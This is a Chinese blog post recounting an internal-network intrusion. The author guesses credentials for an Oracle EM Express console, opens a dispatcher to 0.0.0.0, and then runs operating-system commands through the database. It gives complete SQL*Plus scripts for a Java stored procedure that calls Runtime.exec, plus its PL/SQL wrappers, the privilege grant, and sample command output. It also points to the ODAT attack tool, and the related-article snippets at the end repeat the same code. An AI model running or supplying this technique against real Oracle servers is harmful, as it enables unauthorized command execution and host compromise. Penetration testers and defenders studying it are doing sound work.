oracle odat,通过Oracle执行系统命令

最新推荐文章于 2022-10-13 11:55:43 发布
最新推荐文章于 2022-10-13 11:55:43 发布
阅读量456 收藏
点赞数
文章标签: oracle odat

成功连接上Oracle后,如何通过Oracle get到os-shell,网上搜集资料解决后进行简单记录。

经历如下:内网中发现oralce em express服务,一个oracle的web管理端,碰撞密码进入后,没有找到什么getshell的点,甚至数据查询等也没有发现,无意中发现了dispather设置项,通过添加dispather监听0.0.0.0后成功连接上数据库(默认的1521是监听在127.0.0.1上的)。

oracle提权执行命令工具oracleShell v0.1

为了快速getshell,通常先去找找有没有现成的实现,找到了rebeyond师傅写的一个小工具。

环境中的oracle版本为12c,这款工具是前两年开发,集成的jdbc版本低,不支持12c新的连接协议,连接会报ORA-28547错误,11g以下的版本应该是可以使用的。

使用sql*plus

Oracle的sql*plus是与oracle进行命令行交互的客户端工具,安装oracle一般会自带。

连接命令分两种(dba用户登录时带上as sysdba):sqlplus [email protected]:port/sid [as sysdba]

sqlplus /nolog

SQL> conn [email protected]:port/sid [as sysdba]

sqlplus自带了一个比较坑的命令host

SQL> host hostname

你会发现显示的是你本机的机器名,原来是在本机上执行命令,而不是在连接的远程机器上,好吧。。。

网上找来的方法:

首先在本地新建3个sql文件,用于sqlplus连接后进行执行

新建1.sql1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34create or replace and compile

java souRCe named "util"

as

import java.io.*;

import java.lang.*;

public class util extends Object

{

public static int RunThis(String args)

{

Runtime rt = Runtime.getRuntime();

int RC = -1;

try

{

Process p = rt.exec(args);

int bufSize = 4096;

BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);

int len;

byte buffer[] = new byte[bufSize];

// Echo back what the program spit out

while ((len = bis.read(buffer, 0, bufSize)) != -1)

System.out.write(buffer, 0, len);

RC = p.waitFor();

}

catch (Exception e)

{

e.printStackTrace();

RC = -1;

}

finally

{

return RC;

}

}

}

新建2.sql1

2

3

4

5create or replace

function run_cmd(p_cmd in varchar2) return number

as

language java

name 'util.RunThis(java.lang.String) return integer';

新建3.sql1

2

3

4

5

6create or replace procedure RC(p_cmd in varChar)

as

x number;

begin

x := run_cmd(p_cmd);

end;

登陆上去后依次执行1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39SQL> @1.sql

35 /

Java 已创建。

SQL> @2.sql

6 /

函数已创建。

SQL> @3.sql

7 /

过程已创建。

SQL>

SQL> variable x number;

SQL> set serveroutput on;

SQL> exec dbms_java.set_output(100000);

SQL> grant javasyspriv to system; [这里的system换成你的登录名,dba账户不需要执行这一步]

PL/SQL 过程已成功完成。

SQL> exec :x:=run_cmd('ipconfig');

Windows IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . : localdomain

IP Address. . . . . . . . . . . . : 192.168.91.130

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.91.1

PL/SQL 过程已成功完成。

SQL> exec :x:=run_cmd('whoami'); 可以继续执行其他命令

win2003 + Oracle 11g,win2008 + Oracle 11g,win2008 + Oracle 12c 测试成功

我虽然使用sys登录,可惜的是拿到的系统权限还是很低。

后续还要对oracle以及oracle的安全问题原理进行研究。

2019-5-1更新:

发现了一个更加方便好用的工具:odat,github可以搜索到。

参考文章

川澄雫
关注
Oracle漏扫工具部署测试
nslogheyang的博客
08-19 894
Oracle漏扫工具部署测试前言第一步第二步第三步测试 前言 ODAT: Oracle Database Attacking Tool是github上开源的一款关于oracle漏洞扫描的工具。 代码地址: https://github.com/quentinhardy/odat.git 支持的oracle数据库版本:10g,11g,12c。 系统:linux python版本:2.7 第一步 准备...
Oracle运行操作系统命令
07-12
Oracle运行操作系统命令Oracle运行操作系统命令
oracle 渗透,ODAT:一款专门用于Oracle渗透的工具
weixin_35945980的博客
04-03 458
ODAT(Oracle Database Attacking Tool)是一款开源的渗透测试工具,主要用于测试远端oracle数据库的安全性。ODAT使用场景示例:你希望找到远端Oracle数据库的SID和有效凭证以连接数据库你已获取到一个有效的Oracle帐户,并想将你的权限提升为DBA或SYSDBA你有一个Oracle帐户,并希望执行系统命令(例如,反向shell),以在托管数据库的操作系统上...
利用oracle执行系统命令
一个码农的笔记
04-11 6105
c:\1.sql create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime
oracle cmd
mmllkkjj的专栏
01-14 637
<br />装了一个oracle db11g,于是想试一下网上流传的在sqlplus中执行cmd的一些命令,也不知怎么的,没一个好用的,可能是网上转来转去的转错了.不过有一个简单的执行cmd命令方法:<br />SQL> host net user<br />User accounts for //PC-ATQHJ4UG1SDA<br />----------------------------------------------------------------------------<br /> _
java餐桌点餐系统源码-odat:ODATOracle数据库攻击工具
06-05
帐户,并且想要执行系统命令(例如反向 shell ),以便在托管数据库的操作系统上继续前进。 在 Oracle 数据库10g 、 11g 、 12c 、 18c和19c 上测试。 ODAT linux 独立版本,. 注意推荐使用开发版( git clone ), ...
Oracle数据库权限提升与远程连接测试工具
虽然Oracle数据库本身不直接提供在DB所在主机上执行系统命令的机制,但具有SYSDBA权限的用户理论上可以通过操作系统链接(如使用UTL_FILE包)或数据库内置的外部程序调用功能(如DBMS_SCHEDULER或DBMS_LOCK/SLEEP)...
64位Windows 7系统下Visual Studio 2010连接Oracle解决方案
通过以上的知识点解析,用户应该能够对“64位Windows 7 下VisualStudio 2010访问Oracle设置及安装ODAC及ODT”的整个过程有了全面的认识。在安装和配置过程中,一定要注意操作系统的位数、安装包版本的兼容性以及安装...
64位Windows 7 下VistualStudio 2010 访问ORACLE 设置及安装 ODAC 及ODT
04-23
在实际开发中,可能还需要安装ODATOracle Developer Tools for .NET Advanced Tools),它包含了一些高级特性,如Oracle Entity Framework支持和Oracle ADO.NET Entity Designer扩展。安装过程与ODT类似,但请注意...
oracle系统命令
12-14
该文档主要整理了创建实例用户及分配权限和如何查看oracle版本及函数存储过程索引
oracle 执行操作系统命令
huryer的专栏
01-29 2124
问题描述 Oracle数据库安装在windows 2008 远程服务器上,今天发现无法远程登录到windows,需要远程重启操作系统; 通过远程重启命令:shutdown /r /m \\192.168.1.2 /t 10仍然无法重启系统; 想到sqlserver可以通过xp_cmdshell执行操作系统命令,实现重启; 需要分析oracle是否有类似功能可以实现执行操作系统命令; 解决办法 /*...
oracle调用执行操作系统命令
sqlora的专栏
08-04 1716
需创建java source、函数和存储过程 /* oracle 执行操作系统命令 如下命令需要在sqlplus下执行; */ -- 创建java source create or replace and compile java source named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args)
oracle执行系统命令
snwofake的博客
09-01 438
测试成功环境:windows XP+oracle 10g、window 2008 R2 + 11g     代码如下:   create or replace and compile Java Source named "OSCommand" as -- java: OS COMMAND import java.io.*; import java.lang.*; ...
通过Oracle在服务器执行操作系统命令并获取返回
snake524的博客
10-13 573
通过Oracle连接,在Oracle session中执行操作系统命令操作数据库服务器并获取返回
利用oracle执行系统命令,利用oracle存储过程执行操作系统命令(转)
weixin_35572715的博客
04-06 608
以下方法在WINNT,LINUX下的oracle9i上测试通过,java过程调用系统命令首先给使用java存储过程的用户授予一定的权限<>表示所有文件,也可以单独指定文件。r w e d表示四种操作Code:Dbms_Java.Grant_Permission('HR','java.io.FilePermission', '<>','read ,write, execute...
oracle在c批量执行命令,利用oracle执行系统命令!
weixin_34440189的博客
04-06 206
c:\1.sqlcreate or replace and compilejava souRCe named "util"asimport java.io.*;import java.lang.*;public class util extends Object{public static int RunThis(String args){Runtime rt = Runtime.getRunti...
oracle 操作系统命令,Oracle 数据库执行 操作系统的命令
weixin_42098104的博客
04-16 239
nutz的json视图2.3. json视图返回json视图有两种方法:@Ok("json") 与@Ok(“raw:json”)2.3.1. @Ok("json")(1) ...Populating Next Right Pointers in Each Node &lbrack;LeetCode&rsqb;Given a binary tree struct Tree...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值